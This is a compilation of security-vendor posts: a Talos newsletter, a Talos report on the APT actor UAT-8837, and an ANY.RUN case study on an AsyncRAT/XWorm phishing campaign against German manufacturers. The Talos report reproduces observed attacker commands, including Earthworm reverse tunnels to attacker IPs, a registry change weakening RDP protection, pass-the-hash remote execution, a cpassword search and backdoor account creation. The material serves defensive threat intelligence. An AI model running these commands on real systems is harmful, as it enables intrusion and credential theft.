Welcome to this week’s edition of the Threat Source newsletter. 

It’s become traditional at this time of year to make predictions about cybersecurity for the coming year. Obviously, no one has a crystal ball to predict the future, and if they did, they would be quietly making a fortune rather than sharing their insights in a newsletter. Any predictions about what lies ahead in the coming year should be taken with a generous pinch of salt. 

However, the exercise isn’t futile. Taking time to pause and reflect on the current threat landscape, the forces driving change, and how our own exposure is evolving can help us form reasonable guesses about what might happen during the forthcoming year. 

We’re living in a very tense geopolitical environment. We should expect continued use of infostealer malware and phishing campaigns as adversaries seek to map supply chains, and understand how organisations and governments may react to escalating aggression. As part of this activity, we’ll continue to see proxy actors conducting destructive attacks and financing their activities through extorting payment. Less sophisticated groups may also engage in website defacements or deploy disruptive malware in pursuit of political visibility or ideological goals. 

Suffice to say that we are living in tense and difficult times. In a globally connected world, no one is isolated from the effects of conflict, no matter how distant it may seem. 

At the same time, our use of technology continues to evolve, reshaping our threat exposure. Many organizations have already enthusiastically embraced generative AI. As AI systems are given more autonomy and broader access to internal systems, we can imagine that we will see breaches caused by poorly constrained or insufficiently governed AI agents. 

Many accidental or malicious insider attacks are caused by individuals having excessive permissions or unfettered access to data with little oversight. We can imagine AI agents provoking similar incidents, whether through flawed design, unintended behavior, or deliberate prompt manipulation by an attacker. 

While it is important to consider these newer and more exotic threats, we should not lose sight of the familiar ones. Unpatched systems, leaked credentials, accounts lacking multi-factor authentication, and poor network visibility continue to underpin many successful attacks. 

One thing is certain: Cybersecurity teams will remain busy throughout 2026.  There will be threat actors attempting to compromise our systems, there will be new techniques that they will use, but there will be many more attacks using techniques that we have seen before. 

It’s going to be a demanding year. Wishing good fortune and happy threat hunting to everyone.

The one big thing 

Cisco Talos is monitoring UAT-8837, which we assess with medium confidence is a China-nexus advanced persistent threat (APT) actor. They have been actively targeting critical infrastructure organizations in North America since at least 2025. They typically gain access by exploiting vulnerabilities or using stolen credentials, then use a mix of open-source tools to steal sensitive data and create multiple ways back into the network. UAT-8837 adapts quickly, constantly changing up their tools to evade detection. 

Why do I care? 

This group is focused on high-value targets and uses advanced, constantly evolving techniques that can bypass traditional defenses — even leveraging zero-day vulnerabilities. Their actions can lead to stolen credentials, persistent access, and potentially large-scale supply chain or infrastructure disruptions. 

So now what? 

Stay vigilant by keeping systems patched, monitoring for the specific tools and behaviors outlined in the report, and using up-to-date detection rules from sources like Talos. Proactively hunting for these IOCs and unusual user/account activity, combined with strong credential and privilege management, will be crucial to reducing risk from UAT-8837.

Top security headlines of the week 

BreachForums breached, exposing 324K cybercriminals 
In an ironic development, an individual using the moniker “James” published a database containing detailed information of hundreds of thousands of BreachForum users who believed they were operatinganonymously. (DarkReading) 

Target’s dev server offline after hackers claim to steal source code 
An unknown threat actor has claimed to have stolen a trove of Target’s internal source code and documentation and is selling it on dark web marketplaces. Multiple Target employees have now confirmed the authenticity of leaked source code sample set. (BleepingComputer) 

Predator spyware turns failed attacks into intelligence for future exploits 
New research reveals previously undocumented mechanisms that return information to developers on failed individual attacks. This means Predator can learn from its own failures so that future versions may be hardened against detection and analysis. (SecurityWeek) 

Instagram fixes password reset vulnerability amid user data leak 
Social media giant Meta confirmed an Instagram password reset vulnerability but denied being breached. Meta said the resolved vulnerability allowed third parties to send password reset requests to Instagram users. (SecurityWeek) 

Everest Ransomware claims breach at Nissan, says 900GB of data stolen
While no sensitive personal data is shown in the screenshots themselves, the folder names and file types imply access to operational systems and documents that could be used to map internal processes or extract more sensitive information. (Hack Read) 

Can’t get enough Talos? 

Talos Takes: Cyber certifications and you 
In the first episode of the year, Amy Ciminnisi, Talos’ Content Manager and new podcast host, steps up to the mic with Joe Marshall to explore certifications, one of cybersecurity’s overwhelming (and sometimes most controversial) topics. 

Humans of Talos: Brushstrokes and breaches with Terryn Valikodath 
Join us as Terryn shares what keeps him motivated during high-pressure incidents, the satisfaction he finds in teaching others during Cyber Range trainings, and the creative outlets that help him recharge. 

Microsoft Patch Tuesday for January 2026 
Microsoft has released its monthly security update for January 2026, which includes 112 vulnerabilities affecting a range of products, including 8 that Microsoft marked as “critical.”

Upcoming events where you can find Talos 

• JSAC (Jan. 21 – 23) Tokyo, Japan
• Cisco Live Amsterdam (Feb. 9 – 13) Amsterdam, Netherlands
• S4x26 (Feb. 23 – 26) Miami, FL  

Most prevalent malware files from Talos telemetry over the past week 

SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 
MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59  
Example Filename: APQCE0B.dll  
Detection Name: Auto.90B145.282358.in02 

SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
MD5: 7bdbd180c081fa63ca94f9c22c457376  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
Example Filename: e74d9994a37b2b4c693a76a580c3e8fe_3_Exe.exe  
Detection Name: Win.Dropper.Miner::95.sbx.tg 

SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
Example Filename: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507.exe  
Detection Name: Win.Worm.Coinminer::1201 

SHA256: 41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610  
MD5: 85bbddc502f7b10871621fd460243fbc  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610  
Example Filename: 85bbddc502f7b10871621fd460243fbc.exe  
Detection Name: W32.41F14D86BC-100.SBX.TG 

SHA256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca  
MD5: 71fea034b422e4a17ebb06022532fdde  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca  
Example Filename: VID001.exe  
Detection Name: Coinminer:MBT.26mw.in14.Talos 

Cisco Talos Blog – ​Read More

• Cisco Talos is closely tracking UAT-8837, a threat actor we assess with medium confidence is a China-nexus advanced persistent threat (APT) actor based on overlaps in tactics, techniques, and procedures (TTPs) with those of other known China-nexus threat actors.
• Based on UAT-8837’s TTPs and post-compromise activity Talos has observed across multiple intrusions, we assess with medium confidence that this actor is primarily tasked with obtaining initial access to high-value organizations.
• Although UAT-8837’s targeting may appear sporadic, since at least 2025, the group has clearly focused on targets within critical Infrastructure sectors in North America.

After obtaining initial access — either by successful exploitation of vulnerable servers or by using compromised credentials — UAT-8837 predominantly deploys open-source tools to harvest sensitive information such as credentials, security configurations, and domain and Active Directory (AD) information to create multiple channels of access to their victims. The threat actor uses a combination of tools in their post-compromise hands-on-keyboard operations, including Earthworm, Sharphound, DWAgent, and Certipy. The TTPs, tooling, and remote infrastructure associated with UAT-8837 were also seen in the recent exploitation of CVE-2025-53690, a ViewState Deserialization zero-day vulnerability in SiteCore products, indicating that UAT-8837 may have access to zero-day exploits.

---

Post-compromise actions

UAT-8837 can exploit both n-day and zero-day vulnerabilities to gain access to target environments. Most recently, UAT-8837 exploited a ViewState Deserialization zero-day vulnerability in SiteCore products, CVE-2025-53690, to obtain initial access.

After UAT-8837 gains initial access, they begin conducting preliminary reconnaissance, leveraging the following commands:

ping google[.]com
tasklist /svc
netstat -aon -p TCP
whoami
quser
hostname
net user

The threat actor disables RestrictedAdmin for Remote Desktop Protocol (RDP) to obtain credentials for remoting into other devices:

REG ADD HKLMSystemCurrentControlSetControlLsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

A shell console may subsequently be opened via “cmd.exe” to conduct hands-on keyboard activity on the compromised endpoint. Multiple artifacts are then downloaded to the following directories which were extensively used for staging artifacts:

C:Users<user>Desktop
C:windowstemp
C:windowspublicmusic

UAT-8837 tool usage

UAT-8837 may use a variety of tooling throughout the course of an intrusion. This variation in tooling may be because many of these tools are detected and blocked by most security products such as Cisco Secure Endpoint (CSE) which often leads the threat actor to cycle through different variants of the tools to find versions that are not detected.

GoTokenTheft

The GoTokenTheft utility is a tool for stealing access tokens. Written in GoLang and deployed at C:Users<user>Desktopgo.exe, it may be used to steal tokens to run commands with elevated privileges:

eee.ico REG ADD HKLMSystemCurrentControlSetControlLsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

Earthworm

Earthworm is network tunneling tool that has extensively been used by Chinese-speaking threat actors in intrusions to expose internal endpoints to attacker-owned remote infrastructure. UAT-8837 deploys multiple versions of Earthworm to determine which are not detectable by endpoint protection products. The undetected version is then used to create a reverse tunnel to attacker-controlled servers, as seen in the commands below:

C:WindowsTempv.ico -s rssocks -d 172[.]188[.]162[.]183 -e 1433
  
C:userspublicvideosverr.ico -s rssocks -d 172.188.162.183 -e 443
  
C:WindowsTempeir.ico  -p 8888 -t 172[.]188[.]162[.]183 -f 11112
  
cisos.ico -s rssocks -d 172[.]188[.]162[.]183 –e80
  
vgent.ico -s rssocks -d 172[.]188[.]162[.]183 -e 443
  
vgent.ico -s rssocks -d 172[.]188[.]162[.]183 -e 447
  
abc.ico -s rssocks -d 4[.]144[.]1[.]47 -e 448
  
C:userspublicmusicaa.exe -s rssocks -d 74[.]176[.]166[.]174 -e 443
  
C:UserspublicMusictwd.exe -s rssocks -d 20[.]200[.]129[.]75 -e 443

DWAgent

UAT-8837 deploys DWAgent, a remote administration tool, to make it easier to access the compromised endpoint and drop additional malware to the system:

C:Users\Downloadsdwagent.exe
 
C:Users\AppDataLocalTempdwagent20250909101732runtimedwagent.exe -S -m installer

SharpHound

Per Talos’ observations, UAT-8837 downloads SharpHound with the intention to collect Active Directory information:

C:WindowsTempSharpHound.exe

Impacket

UAT-8837 makes several attempts to download Impacket-based binaries to use in their operations:

C:WindowsTempwec.ico

When Impacket is detected and blocked, Invoke-WMIExec is downloaded to run commands with elevated privileges:

C:WindowsTempInvoke-WMIExec.ps1

GoExec

In one intrusion, after cycling through a number of tools, UAT-8837 deployed GoExec, a GoLang-based remote execution tool to execute commands on other connected remote endpoints within the victim’s network:

goe.ico wmi proc 10[.]xx[.]xx[.]xx -u <u>/<p> -H <hash> -e 'cmd.exe' -a '/C hostname /all' -o-
 
C:WindowsTempgoe.exe wmi proc 10[.]xx[.]xx[.]xx 
 
goe.ico wmi proc 10[.]xx[.]xx[.]xx -u <u>/<p> --nt-hash <hash> -e cmd.exe -a /C hostname -o 1.txt
 
goe.ico wmi proc 10[.]xx[.]xx[.]xx -u <user> --nt-hash <hash> -e cmd.exe -a /C hostname -o 1.txt
 
goe.ico wmi proc 10[.]xx[.]xx[.]xx -u <user> --nt-hash 00000000000000000000000000000000:<hash> -e cmd.exe -a /C hostname -o 1.txt
 
goe.ico dcom mmc 10[.]xx[.]xx[.]xx -u <user> --nt-hash 00000000000000000000000000000000:<hash> -e cmd.exe -a /C hostname -o 1.txt
 
goe.ico wmi proc 10[.]xx[.]xx[.]xx -u <user> -p <password> -e cmd.exe -a /C hostname -o 1.txt
 
g.ico dcom mmc 10[.]xx[.]xx[.]xx -u <user> -p <password> -e cmd.exe -a /C ipconfig -o-
g.ico wmi proc 10[.]xx[.]xx[.]xx -u <user> -p <password> -e cmd.exe -a /C hostname -o-

It is worth noting here that the usage of GoExec was likely an on-the-fly decision by the operator, necessitated by the constant detection and blocking of the threat actors tooling by CSE.

The threat actor also attempted to download and execute SharpWMI in the compromised environment, which was again detected by CSE:

C:WindowsTemps.ico

Rubeus

Rubeus, a C# based toolset for Kerberos abuse may also be deployed:

• C:WindowsTempr.ico
• C:WindowsTemplo.txt

Certipy

UAT-8837 also deploys Certipy, a tool for AD discovery and abuse, to:

C:WindowsTempCertipy.exe

Hands-on-keyboard activity

UAT-8837 may run a series of commands during the intrusion to obtain sensitive information, such as credentials from victim organizations:

findstr /S /l cpassword [\]policies*.xml

 The system’s security configuration is also exported using secedit:

secedit /export /cfg C:windowstemppol.txt

 Windows Local security policies extracted via secedit include password policies, user rights and audit settings. This information may be valuable to adversaries who seek to evaluate an endpoint’s security posture including network security settings.

In one victim organization, UAT-8837 exfiltrated DLL-based shared libraries related to the victim’s products, raising the possibility that these libraries may be trojanized in the future. This creates opportunities for supply chain compromises and reverse engineering to find vulnerabilities in those products.

Domain reconnaissance

The net commands typically used to query domain groups and users are:

net group domain admins /domain

net localgroup administrators /domain

net group <name> /domain
 
net user <user> <password> /domain

net user <user> /domain

net accounts /domain

net user <user> /domain
 
nltest /DCLIST:<domain>

nslookup <subdomina>.<domain>

 The setspn command is used to list and query Service Principal Names (SPN) data from Active Directory:

setspn -L 

setspn -Q */*

Active Directory reconnaissance

UAT-8837 deploys a combination of tools to perform AD reconnaissance in the compromised environment. These tools include SharpHound and Certipy. The threat actor also uses the Windows-native tool “setspn” to query for AD data. However, UAT-8837 also brings their own living-off-the-land (LOTL) tooling. In one intrusion, the actor deployed dsget and dsquery to query for specific properties in the AD:

dsquery.exe user -limit 0 
  
dsquery.exe user -name <name>
  
dsget user -samid -display -email -upn
  
dsget.exe user -samid -display -email -upn
  
dsquery.exe user -samid <id> 
  
dsget.exe user -display -email -upn
  
dsquery.exe user -name admin
  
dsget.exe user CN=<id>,OU=ServiceAccounts,OU=Production,DC=prod,DC=<domain>,DC=com -samid -display -email -upn
  
dsget.exe user CN=<id>,OU=ServiceAccounts,OU=Production,DC=prod,DC=<domain>,DC=com -upn
  
dsget.exe user CN=<id>,OU=ServiceAccounts,OU=Production,DC=prod,DC=<domain>,DC=com –memberof
  
dsget.exe user CN=<id>,OU=ServiceAccounts,OU=Production,DC=prod,DC=<domain>,DC=com –disabled
  
dsquery * DC=prod,DC=<domain>,DC=com -filter (objectClass=user) -attr * -limit 0

Backdoored user accounts

The threat actor created user accounts to open up another channel of access to the compromised environment:

net user <user> <password> /add /domain

In another instance, UAT-8837 added an existing user account to local groups:

net user <user>
  
net localgroup <group> <user> /add

Coverage

The following ClamAV signature detects and blocks this threat:

• Win.Malware.Earthworm

The following Snort Rules (SIDs) detect and block this threat:

• Snort 2 – 61883, 61884, 63727, 63728
• Snort 3 – 300585, 63727, 63728

Indicators of compromise (IOCs)

The IOCs for this threat are also available at our GitHub repository here.

1b3856e5d8c6a4cec1c09a68e0f87a5319c1bd4c8726586fd3ea1b3434e22dfa – GoTokenTheft
451e03c6a783f90ec72e6eab744ebd11f2bdc66550d9a6e72c0ac48439d774cd - Earthworm
B3f83721f24f7ee5eb19f24747b7668ff96da7dfd9be947e6e24a688ecc0a52b – Earthworm
Fab292c72ad41bae2f02ae5700c5a88b40a77f0a3d9cbdf639f52bc4f92bb0a6 – Earthworm
4f7518b2ee11162703245af6be38f5db50f92e65c303845ef13b12c0f1fc2883 - Earthworm
 
891246a7f6f7ba345f419404894323045e5725a2252c000d45603d6ddf697795 - GoTokenTheft
5090f311b37309767fb41fa9839d2770ab382326f38bab8c976b83ec727e6796 – SharpHound
6e8af5c507b605a16373e8453782bfd8a3ec3bd76f891e71a159d8c2ff2a5bb0 – Impacket
887817fbaf137955897d62302c5d6a46d6b36cb34775e4693e30e32609fb6744 – GoExec
4af156b3285b49485ef445393c26ca1bb5bfe7cdc59962c5c5725e3f3c574f7c - GoExec
1de72bb4f116e969faff90c1e915e70620b900e3117788119cffc644956a9183 – SharpWMI
51d6448e886521aaaaf929a50763156ceb99ede587c65de971700a5583d6a487 – Rubeus
2f295f0cedc37b0e1ea22de9d8cb461fa6f84ab0673fde995fd0468a485ddb59 – Rubeus
E27e6e8e97421593f1e8d66f280e894525e22b373248709beaf81dc6107fb88d – Certipy
 
B7ecd4ff75c0e3ed196e1f53d92274b1e94f17fa6c39616ce0435503906e66fb
42e3ad56799fbc8223fb8400f07313559299496bb80582a6cbae29cb376d96c3
6d20371b88891a1db842d23085a0253e36cf3bf0691aee2ae15a66fc79f3803d
4e8304040055d3bffcb3551873da45f66577723d1a975416a49afa5aec4eb295
BDF7B28DF19B6B634C05882D9F1DB73F63252F855120ED3E4DA4E26F2C6190E8
1c5174672bf2ccedb6a426336ca79fd326e61cd26dd9ae684b8ffd0b5a70c700
d0beb6184ea4402c39e257d5912c7ace3607e908e76127014e3ec02866b6d70c
194ca1b09902ceaaa8a7e66234be9dc8a12572832836361f49f1074eae861794
74e68b4e07d72c9b8e0bc8cbfd57f980b4a2cd9d27c37bb097ca4fb2108706e3
Ced14e8beb20a345a0d6f90041d8517c04dbc113feff3bc6e933968d6b846e31
8bf233f608ea508cd6bf51fb23053d97aa970b8d11269d60ce5c6e113e8e787a
5391f69425217fa8394ebac0d952c5a3d1f0f5ac4f20587978cd894fdb6199cd
8bc008a621c5e3068129916770d24ee1d7d48079ee42797f86d3530ca90e305c
De9c13b1abeab11626a8edc1385df358d549a65e8cc7a69baca84cd825acc8e7
4d47445328bfd4db12227af9b57daab4228244d1325cba572588de237f7b2e98
 
74[.]176[.]166[.]174
20[.]200[.]129[.]75
172[.]188[.]162[.]183
4[.]144[.]1[.]47
103[.]235[.]46[.]102

Cisco Talos Blog – ​Read More

Manufacturing companies have quietly become one of the most hunted species in the modern threat landscape. Not because they are careless, but because they are operationally critical, geographically distributed, and often rely on complex IT and OT environments that attackers love to probe. 

Key Takeaways 

• Manufacturing is among the top industries targeted by ransomware groups and advanced campaigns, often with region-specific lures. 

• Attackers continue to favor invoice-themed and supplier-related emails, carefully localized to increase trust and click-through rates in manufacturing environments. 

• Files detected by only one or two vendors often indicate fresh attacks designed to bypass traditional defenses, making early discovery critical. 

• The reuse of WebDAV, known vulnerabilities, and familiar RAT families across cases helps analysts distinguish structured campaigns from background noise. 

• Filtering threats by sector and country dramatically improves relevance, allowing teams to focus on attacks that are most likely to impact their business. 

• By identifying campaigns before alerts trigger, organizations can shorten dwell time and prevent disruptions that are especially costly for manufacturing operations. 

• By correlating industry, geography, techniques, and indicators, Threat Intelligence Lookup helps manufacturing companies uncover active campaigns early and turn threat intelligence into a preventive control, not just a reference source. 

The Threat Landscape: Manufacturing Under Siege 

ANY.RUN‘s data, based on sandbox submissions of over 500K analysts and 15K SOCs, shows increased malicious activity against manufacturing companies. While this uptick aligns with patterns across other industries, manufacturing consistently shows slightly higher-than-average attack rates, confirming its status as a priority target. 

Top businesses operating in the industry rely on Threat Intelligence Lookup to track the latest attacks and campaigns conducted against manufacturing enterprises. 

Accessing an up-to-date threat landscape for your industry requires just one search query: 

industry:”Manufacturing” 

The service instantly delivers actionable intelligence on the latest cyber threats targeting companies around the world.  

Learn more about threat landscape tracking with TI Lookup → 

This enables SOC teams to timely update their defenses before the attackers have a chance to strike. By acting proactively, organizations are able to protect their infrastructure, prevent downtime, and avoid incident response costs. 

Threat Hunting for a German Manufacturing Company 

NOTE: This case study demonstrates how malware analysts use proactive threat hunting with ANY.RUN’s Threat Intelligence Lookup to identify and analyze real-world attacks targeting manufacturing companies, specifically focusing on a sophisticated campaign against German industrial firms.  

(We have substituted the actual company’s name by a COMPANY_NAME placeholder.) 

Let’s assume we are conducting continuous threat hunting for a manufacturing company based in Germany. Our objective is simple but critical: identify phishing emails as potential initial access vectors before they reach production systems. 

Using ANY.RUN’s Threat Intelligence Lookup, we build a focused query: 

industry:”Manufacturing” AND filePath:”*.eml” AND not threatLevel:”info” AND submissionCountry:”DE” 

With a 90-day analysis window, the search yielded over 30 real-world cases representing potential intrusion attempts against organizations similar to ours. 

A Closer Look at One Real Attack 

One case stood out for its sophistication and targeted approach.  

The attack leveraged the brand of a popular software provider in Germany, indicating specific targeting of German companies. What made this case particularly noteworthy was the combination of: 

• Exploitation of a recently disclosed vulnerability, 

• Simultaneous deployment of two Remote Access Trojans (RATs): AsyncRAT and XWorm, 

• Highly convincing social engineering tactics. 

The attack targeted a German construction and engineering services company through a carefully crafted phishing email: 
 
Sender Spoofing: 

• Display name: “COMPANY_NAME eG” (legitimate company name), 

• Actual sender: g.bader-gmbh@gmx[.]de (German domain for additional authenticity). 

Email Content: 

• Designed as an invoice notification from COMPANY_NAME, 

• Included document number and date for legitimacy, 

• Professional design increasing click-through probability, 

• Malicious link embedded in the message. 

Clicking the link redirected victims to Dropbox, where a file named “COMPANY_NAME -Rechnung Nr. 21412122025.pdf.zip” awaited download. 

Obfuscation Techniques: 

• Double file extension (.pdf.zip) to disguise the true file type; 

• Archive contained “COMPANY_NAME-Rechnung Nr. 21412122025.pdf.url”, a shortcut file masquerading as a PDF; 

• Formatting designed to encourage victims to open the file 

Detection Evasion: 

At the time of analysis, this file was flagged as malicious by only one vendor on VirusTotal. That low detection rate strongly suggests a fresh sample designed to bypass traditional security controls. 

The attack leveraged CVE-2024-43451, a vulnerability that enables automatic WebDAV connections without actually opening the .url file. During archive processing or interaction with the attachment, the system automatically connects to a remote resource. 

Execution Flow: 

• Opening the .url file from the ZIP archive; 

• Remote resource displays as a network directory; 

• Contains .lnk file disguised as a PDF; 

• Launching this file triggers subsequent attack stages; 

• Results in XWorm and AsyncRAT deployment. 

This combination provides attackers with redundancy and persistence, increasing the chances of maintaining access to the victim’s environment. 

Notably, similar WebDAV-based techniques exploiting this vulnerability have been observed in APT activity, confirming that this is not opportunistic noise but a well-established attack pattern. 

Expanding the Investigation: Campaign Scope Analysis 

Identifying one attack is only the beginning. The real value of proactive threat hunting lies in understanding scale, patterns, and relevance. 

Using Threat Intelligence Lookup, we pivot from the original case to search for related activity: emails and PDFs containing“COMPANY_NAME” in file names; hashes associated with the malicious documents. 

filePath:”COMPANY_NAME.pdf*” or filePath:”COMPANY_NAME.eml” or sha256:”8af19a103fbab4d5a2b9f59098e78e61df1721508e2d148fe9ba2b29e72900ca” 

Query Results: 

• 35 analyses matching the specified parameters; 

• Almost all of them uploaded starting November 4, confirming recent activity; 

• Multiple instances showing Dropbox connections for ZIP archive delivery; 

• Generated indicators suitable for enriching detection systems. 

When we analyze the industry and geography breakdown, the picture becomes even clearer. Manufacturing remains one of the top targeted industries, with nearly two-thirds of executions occurring in Germany. The same core techniques appear repeatedly: CVE-2024-43451, WebDAV abuse, AsyncRAT, and XWorm. 

Hash search of the PDF file employed in the attack shows 40% of submissions from manufacturing industry and 100% of uploads by ANY.RUN’s Sandbox users from Germany:  

SHA256:”8af19a103fbab4d5a2b9f59098e78e61df1721508e2d148fe9ba2b29e72900ca” 

Since AsyncRAT and XWorm are widely used, we narrow our focus to the vulnerability itself. A lookup for CVE-2024-43451 shows that most samples originate from the EU, with Germany accounting for roughly half of them. Manufacturing once again appears among the primary targeted industries. WebDAV connections are present in all samples, indicating standardized attack logic. 

threatName:”CVE-2024-43451″ 

This level of repetition is exactly what threat hunters look for. It provides solid arguments to prioritize the threat, enrich internal detection systems with relevant indicators, and proactively hunt for similar behavior in logs, email gateways, and network traffic. 

Discovering Industry-Specific Patterns 

Threat Intelligence Lookup also allows us to search for malicious activity tied to industry-specific domain patterns. By querying domains containing fragments like “manufactur” and filtering for confirmed malicious activity, we uncover more than 100 sandbox analyses and dozens of suspicious domains. 
 
domainName:”manufactur*” and threatLevel:”malicious” 

These findings help extend detection beyond known campaigns and uncover infrastructure that may be reused in future attacks against manufacturing organizations. 

Key Findings and Implications 

This case clearly shows that attacks using COMPANY_NAME-themed lures, WebDAV and CVE-2024-43451 abuse remain highly relevant for manufacturing companies, especially in Germany. More importantly, it demonstrates how proactive threat hunting changes the security posture entirely. 

Instead of reacting to alerts after compromise, malware analysts can: 

• Identify active campaigns targeting their industry and region; 

• Understand attacker techniques before they reach production; 

• Prioritize threats based on real-world repetition and relevance; 

• Feed high-confidence indicators into detection and prevention systems. 

With ANY.RUN’s Threat Intelligence Lookup, threat intelligence becomes a living, searchable environment rather than a static feed. For manufacturing companies facing constant operational pressure, this proactive approach can mean the difference between uninterrupted production and costly downtime. 

Stay Ahead of Attacks with ANY.RUN 

ANY.RUN helps security teams move earlier in the attack lifecycle by combining real-time malware analysis with actionable threat intelligence. 

With the Interactive Sandbox, analysts can safely execute suspicious files and instantly observe attacker behavior, techniques, and indicators to accelerate MTTD and MTTR. 

Threat Intelligence Feeds expand threat coverage with verified malicious network IOCs from real-time attacks on 15K+ orgs. Delivered instantly from ANY.RUN’s sandbox in flexible STIX/TAXII for seamless SIEM/SOAR integration. 

TI Feeds empower SOC teams to ensure: 

• Early Detection: IOCs added right after live sandbox analysis—proactively spot new threats in your SOC before they hit. 

• Expanded Coverage: 99% unique indicators from global attacks (phishing, malware) that traditional feeds miss. 

• Reduced Workload: Malicious-only alerts, filtered to slash Tier 1 time on false positives. 

For manufacturing facing targeted campaigns and high downtime costs, it provides visibility into real attacks as they unfold, allowing them to spot risks before production halts. 

About ANY.RUN  

ANY.RUN supports more than 15,000 organizations worldwide, including leaders in finance, healthcare, telecom, retail, and tech, helping them strengthen security operations and respond to threats with greater confidence.   

Designed for speed and visibility, the solutions provide interactive malware analysis and live threat intelligence, giving SOC teams instant insight into attack behavior and the context needed to act faster.   

Request a trial or quote for your company → 

FAQ: Proactive Threat Hunting for Manufacturing 

The post German Manufacturing Under Phishing Attacks: Tracking a Stealthy AsyncRAT Campaign  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More